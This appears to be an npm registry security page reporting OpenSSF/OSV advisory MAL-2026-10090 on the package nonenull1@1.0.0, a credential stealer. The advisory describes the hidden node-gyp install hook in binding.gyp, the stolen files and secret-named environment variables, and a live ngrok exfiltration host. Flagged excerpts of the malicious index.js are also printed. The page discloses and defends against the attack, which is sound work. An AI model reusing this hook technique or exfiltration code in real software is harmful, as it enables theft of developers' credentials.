registry  /  nonenull1  /  1.0.0

nonenull1@1.0.0

OSV Malicious Advisory

scanned 1h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10090 confirms this npm version as malicious. On `npm install`, nonenull1@1.0.0 auto-executes a credential stealer via node-gyp. package.json sets `gypfile: true`, and the shipped binding.gyp declares no native sources but places a GYP command-expansion `<!(node index.js...)` in the sources array, so node-gyp rebuild runs index.js during the configure step (an implicit install hook that is not declared as scripts.postinstall). index.js then: (1) collects host...

Advisory
MAL-2026-10090
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in nonenull1 (npm)
Details
On `npm install`, nonenull1@1.0.0 auto-executes a credential stealer via node-gyp. package.json sets `gypfile: true`, and the shipped binding.gyp declares no native sources but places a GYP command-expansion `<!(node index.js...)` in the sources array, so node-gyp rebuild runs index.js during the configure step (an implicit install hook that is not declared as scripts.postinstall). index.js then: (1) collects host fingerprint (os.hostname, os.userInfo, process.platform, cwd, node version, git user.email) and POSTs it to https://crabbing-thong-overhung.ngrok-free.dev/ping; (2) reads every file in ~/.ssh, ~/.aws, ~/.config, ~/.kube, ~/.docker, and ~/.gnupg, plus every.env* file discovered walking 8 directory levels up from cwd, and POSTs the contents to /exfil at the same host; (3) filters process.env for keys matching token|secret|key|pass|pwd|auth|api|cred|jwt|cookie and exfiltrates those values. The destination is a hardcoded ngrok tunnel controlled by the publisher. This is a textbook installer-side credential stealer with an implicit install hook designed to evade manifest-only scanners. ## Source: ossf-package-analysis (5f02ee2873da4d092fe8c8cc7418db3d2c661a64e5015eb0505fe26e5979da80) The OpenSSF Package Analysis project identified 'nonenull1' @ 1.5.2 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystemNetworkShell
Supply chain
UrlStrings
Manifest
NoLicense
scanned 1 file(s), 2.63 KB of source, external domains: crabbing-thong-overhung.ngrok-free.dev

Source & flagged code

4 flagged · loading source
index.jsView file
1const https = require('https'); L2: const os = require('os'); ... L4: const path = require('path'); L5: const { execSync } = require('child_process'); L6: ... L24: req.on('error', () => r(0)); L25: req.write(body); L26: req.end(); ... L42: await post('/ping', { L43: host: os.hostname(), L44: user: os.userInfo().username, ... L97: const env = {};
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1
1const https = require('https'); L2: const os = require('os'); ... L4: const path = require('path'); L5: const { execSync } = require('child_process'); L6: ... L24: req.on('error', () => r(0)); L25: req.write(body); L26: req.end(); ... L42: await post('/ping', { L43: host: os.hostname(), L44: user: os.userInfo().username, ... L97: const env = {};
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L1
binding.gypView file
path = binding.gyp kind = build_helper sizeBytes = 174 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

binding.gypView on unpkg
package.jsonView file
scripts registry_only=install
Critical
Manifest Confusion

Tarball package.json differs from the npm registry version manifest for scripts or dependency sets.

package.jsonView on unpkg

Findings

1 Critical2 High4 Medium3 Low
CriticalManifest Confusionpackage.json
HighHost Fingerprint Exfiltrationindex.js
HighSandbox Evasion Gated Capabilityindex.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperbinding.gyp
MediumStructural Risk Force Deep Review
LowFilesystem
LowUrl Strings
LowNo License